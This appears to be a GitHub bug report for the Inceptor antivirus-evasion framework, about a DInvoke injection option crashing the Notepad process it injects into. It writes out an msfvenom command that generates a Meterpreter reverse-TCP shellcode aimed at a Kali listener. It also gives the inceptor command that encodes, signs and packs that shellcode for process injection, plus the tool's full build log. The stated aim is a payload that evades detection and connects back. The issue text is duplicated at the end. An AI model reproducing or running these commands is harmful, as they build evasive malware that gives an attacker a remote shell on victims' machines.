Describe the bug
I use the command containing "-m dinvoke" to compile the packaged exe, which will cause injection of Notepad exceptions
To Reproduce
my os is windows10 and VS version is VS2022
I use msfvenom to create the raw payload in kali, command as below
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
the inceptor bypass command is "python inceptor.py donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15"
use command "demo.bat xx.exe"and the inject victim notepad will exit abnormally
But if I remove the options -m dinvoke, then the final compiled exe can reverse connection to kali successfully.
or if I remove the options -P, then the final compiled exe can also reverse connection to kali successfully.
Expected behavior
run "demo.bat xx.exe" and the final compiled payload can reverse connection to kali
Screenshots
If applicable, add screenshots to help explain your problem.
Debug Info:
Go to your config.ini file
In DEBUG, mark all as 1
Reproduce the bug again
Paste the output given by the tool
▒ by d3adc0de (@klezVirus)
--------------------------------------------------------------------------------------
[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
[>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 1228
[>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
[>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
[>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe" /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe" "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
-----------------------------------------------
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447
[+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
[+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
[+] Signed with: CarbonCopy
[*] Phase 7: Finalising
[+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994
Additional context
Add any other context about the problem here.
Describe the bug I use the command containing "-m dinvoke" to compile the packaged exe, which will cause injection of Notepad exceptions
To Reproduce my os is windows10 and VS version is VS2022 I use msfvenom to create the raw payload in kali, command as below
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
the inceptor bypass command is"python inceptor.py donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15"
use command"demo.bat xx.exe"
and the inject victim notepad will exit abnormally But if I remove the options-m dinvoke
, then the final compiled exe can reverse connection to kali successfully. or if I remove the options-P
, then the final compiled exe can also reverse connection to kali successfully.Expected behavior run "demo.bat xx.exe" and the final compiled payload can reverse connection to kali
Screenshots If applicable, add screenshots to help explain your problem.
Debug Info:
Additional context Add any other context about the problem here.